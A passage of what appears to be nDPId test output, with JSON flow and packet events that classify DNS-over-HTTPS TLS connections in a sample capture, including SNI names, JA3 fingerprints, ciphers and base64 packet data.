DN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} +00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7560000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvh